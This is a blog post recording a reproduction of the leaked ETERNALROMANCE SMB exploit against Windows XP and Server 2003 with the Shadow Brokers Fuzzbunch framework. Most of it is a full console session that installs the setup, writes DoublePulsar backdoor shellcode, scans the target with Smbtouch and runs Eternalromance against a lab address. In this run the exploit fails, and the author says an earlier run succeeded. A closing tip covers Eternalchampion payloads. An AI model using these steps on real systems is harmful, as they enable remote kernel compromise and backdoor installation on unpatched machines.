ETERNALROMANCE 复现

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_20307987/article/details/80321732

make a record . use nsa exploit -> ETERNALROMANCE to attack winxp \ winserver2003

(1)environment
python 2.6.6(python-2.6.6.msi)
shadowbroker-master.zip
pywin32-221.win32-py2.6.exe

which can be run on the windows xp or win7,look here !!!must 32 bit system!!!

(2)unrar shadowbroker-master.zip and use it for attack
if you run fb.py , you will get a error,than mkdir “listeningposts” under windows.than you can go go go !


C:\tools\shadowbroker-master\windows>python fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => C:\tools\shadowbroker-master\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 172.16.17.150
[?] Default Callback IP Address [] : 0.0.0.0
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : c:\logs
[*] Checking c:\logs for projects
Index     Project
-----     -------
0         new
1         Create a New Project

[?] Project [0] : 0
[?] Set target log directory to 'c:\logs\new\z172.16.17.150'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 172.16.17.150
[+] Set CallbackIp => 0.0.0.0

[!] Redirection OFF
[+] Set LogDir => c:\logs\new\z172.16.17.150
[+] Set Project => new

fb > use do
Domaintouch  Doublepulsar
fb > use Doublepulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.17.150

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          172.16.17.150
TargetPort        445
OutputFile
Protocol          SMB
Architecture      x86
Function          OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.17.150] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

   *0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
    2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 0

[*]  OutputFile :: Full path to the output file

[?] OutputFile [] : c:\shellcode1.bin
[+] Set OutputFile => c:\shellcode1.bin


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.17.150] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.17.150:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          172.16.17.150
TargetPort        445
OutputFile        c:\shellcode1.bin
Protocol          SMB
Architecture      x86
Function          OutputInstall

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[+] Writing Installer to disk
[*] Deleting old version of OutputFile if it exists
[*] Shellcode written to OutputFile
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) > use eter
Eternalblue     Eternalchampion Eternalromance  Eternalsynergy
fb Payload (Doublepulsar) > use Eternalromance

[!] Entering Plugin Context :: Eternalromance
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.17.150

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.17.150

[*] Inheriting Input Variables

[!] Enter Prompt Mode :: Smbtouch

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.17.150] :

[*]  TargetPort :: Port used by the SMB service

[?] TargetPort [445] :

[*]  Pipe :: Test an additional pipe to see if it is accessible (optional)

[?] Pipe [] :

[*]  Share :: Test a file share to see if it is accessible (optional), entered as hex bytes (in unicode)

[?] Share [] :

[*]  Protocol :: SMB (default port 445) or NBT (default port 139)

   *0) SMB
    1) NBT

[?] Protocol [0] :

[*]  Credentials :: Type of credentials to use

   *0) Anonymous     Anonymous (NULL session)
    1) Guest         Guest account
    2) Blank         User account with no password set
    3) Password      User name and password
    4) NTLM          User name and NTLM hash

[?] Credentials [0] :


[!] Preparing to Execute Smbtouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels

[+] Configure Plugin Remote Tunnels


Module: Smbtouch
================

Name                    Value
----                    -----
NetworkTimeout          60
TargetIp                172.16.17.150
TargetPort              445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt                False
Pipe
Share
Protocol                SMB
Credentials             Anonymous

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started

[*] TargetIp              172.16.17.150
[*] TargetPort            445
[*] RedirectedTargetIp    (null)
[*] RedirectedTargetPort  0
[*] NetworkTimeout        60
[*] Protocol              SMB
[*] Credentials           Anonymous

[*] Connecting to target...
        [+] Initiated SMB connection

[+] Target OS Version 5.1 build 2600
    Windows 5.1

[!] Target could be either SP2 or SP3,
[!] for these SMB exploits they are equivalent

[*] Trying pipes...
        [+] spoolss    - Success!

[+] Target is 32-bit

[Not Supported]
        ETERNALSYNERGY  - Target OS version not supported

[Vulnerable]
        ETERNALBLUE     - DANE
        ETERNALROMANCE  - FB
        ETERNALCHAMPION - DANE/FB

[*] Writing output parameters

[+] Target is vulnerable to 3 exploits
[+] Touch completed successfully

[+] Smbtouch Succeeded

[*] Exporting Contract To Exploit
[+] Set PipeName => spoolss
[+] Set Credentials => Anonymous
[+] Set Target => XP_SP2SP3_X86


[!] Enter Prompt Mode :: Eternalromance

Module: Eternalromance
======================

Name              Value
----              -----
NetworkTimeout    60
TargetIp          172.16.17.150
TargetPort        445
PipeName          spoolss
ShellcodeFile
ExploitMethod     Default
Credentials       Anonymous
Protocol          SMB
Target            XP_SP2SP3_X86

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.17.150] :

[*]  TargetPort :: Target TCP port

[?] TargetPort [445] :

[*]  PipeName :: The named pipe to use

[?] PipeName [spoolss] :

[*]  ShellcodeFile :: DOPU (ensure correct architecture) ONLY! Other shellcode will likely BSOD.

[?] ShellcodeFile [] : c:\\shellcode1.bin
[+] Set ShellcodeFile => c:\\shellcode1.bin

[*]  ExploitMethod :: Which exploit method to use

   *0) Default              Use the best exploit method(s) for the target OS
    1) Fish-in-a-barrel     Most reliable exploit method (XP/2k3 only)
    2) Matched-pairs        Next reliable exploit method (XP/Win7/2k8R2 only)
    3) Classic-Romance      Original LargePageGroom exploit method (All OS Versions)

[?] ExploitMethod [0] :

[*]  Credentials :: Type of credentials to use

   *0) Anonymous     Anonymous (NULL session)
    1) Guest         Guest account
    2) Blank         User account with no password set
    3) Password      User name and password
    4) NTLM          User name and NTLM hash

[?] Credentials [0] :

[*]  Protocol :: SMB (default port 445) or NBT (default port 139)

   *0) SMB
    1) NBT

[?] Protocol [0] :

[*]  Target :: Operating System, Service Pack, of target OS

    0) XP_SP0SP1_X86         Windows XP Sp0 and Sp1, 32-bit
   *1) XP_SP2SP3_X86         Windows XP Sp2 and Sp3, 32-bit
    2) XP_SP1_X64            Windows XP Sp1, 64-bit
    3) XP_SP2_X64            Windows XP Sp2, 64-bit
    4) SERVER_2003_SP0       Windows Sever 2003 Sp0, 32-bit
    5) SERVER_2003_SP1       Windows Sever 2003 Sp1, 32-bit/64-bit
    6) SERVER_2003_SP2       Windows Sever 2003 Sp2, 32-bit/64-bit
    7) VISTA_SP0             Windows Vista Sp0, 32-bit/64-bit
    8) VISTA_SP1             Windows Vista Sp1, 32-bit/64-bit
    9) VISTA_SP2             Windows Vista Sp2, 32-bit/64-bit
    10) SERVER_2008_SP0       Windows Server 2008 Sp0, 32-bit/64-bit
    11) SERVER_2008_SP1       Windows Server 2008 Sp1, 32-bit/64-bit
    12) SERVER_2008_SP2       Windows Server 2008 Sp2, 32-bit/64-bit
    13) WIN7_SP0              Windows 7 Sp0, 32-bit/64-bit
    14) WIN7_SP1              Windows 7 Sp1, 32-bit/64-bit
    15) SERVER_2008R2_SP0     Windows Server 2008 R2 Sp0, 32-bit/64-bit
    16) SERVER_2008R2_SP1     Windows Server 2008 R2 Sp1, 32-bit/64-bit

[?] Target [1] :


[!] Preparing to Execute Eternalromance
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.17.150] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.17.150:445

[+] Configure Plugin Remote Tunnels


Module: Eternalromance
======================

Name                   Value
----                   -----
NetworkTimeout         60
TargetIp               172.16.17.150
TargetPort             445
MaxExploitAttempts     3
PipeName               spoolss
ExploitMethodChoice    0
ShellcodeFile          c:\shellcode1.bin
CredChoice             0
Username
Password
UsingNbt               False
OsMajor                5
OsMinor                1
OsServicePack          2
ExploitMethod          Default
Credentials            Anonymous
Protocol               SMB
Target                 XP_SP2SP3_X86

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Running Exploit
[*] Initializing Parameters
        [+] Target 172.16.17.150:445
        [+] Authcode: 0x7f4afb0f
        [+] XorMask: 0xe9
        [+] Network Timeout: 60 seconds
[*] Attempting exploit method 1
[*] Initializing Network
        [+] Initial smb session setup completed
[*] Trying pipe spoolss...
        [+] Success!
        [+] Smb pipe and rpc setup complete
[*] Filling barrel with fish... done

<----------------| Entering Danger Zone |----------------->

        [*] Preparing dynamite...
                [*] Trying stick 1 (x86)...Miss
                [*] Trying stick 2 (x86)...Miss
                [*] Trying stick 3 (x86)...Miss
[-] Error 48 (DoRemoteApiLeak)
[-] Error 48 (RunExploitMethod1)
[*] Connections closed, exploit method 1 unsuccessful

[*] Attempting exploit method 2
[*] Initializing Network
        [+] Initial smb session setup completed
[*] Trying pipe spoolss...
        [+] Success!
        [+] Smb pipe and rpc setup complete
[*] Performing initial groom, this may take some time
        [*] Sending 36 groom packets........ done
        [*] Sending 64 bride packets....... done

<----------------| Entering Danger Zone |----------------->

[*] Invoking leak to find transaction...
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[*] Performing initial groom, this may take some time
        [*] Sending 36 groom packets........ done
        [*] Sending 64 bride packets....... done
[*] Invoking leak to find transaction...
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[*] Performing initial groom, this may take some time
        [*] Sending 36 groom packets........ done
        [*] Sending 64 bride packets....... done
[*] Invoking leak to find transaction...
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
        [[[ Leak ]]]->[?] ...Fail
[-] Unable to find transaction in 3 attempts
[-] Error 46 (DoNewTransactionLeak)
[-] Error 46 (RunExploitMethod2)
[-] Error 46 (RunPlugin)
[-] Error 46 (processParams)
[!] Plugin failed
[-] Error: Eternalromance Failed

 OK!!! its a error, i don't know why,when i first use it,sucess!gusess......
tips: if you want to use Eternalchampion
must use copy byte-shellcode as eternalchampion's payload
here is a link:http://www.freebuf.com/articles/system/135270.html 
阅读更多
想对作者说点什么?

博主推荐

换一批

没有更多推荐了,返回首页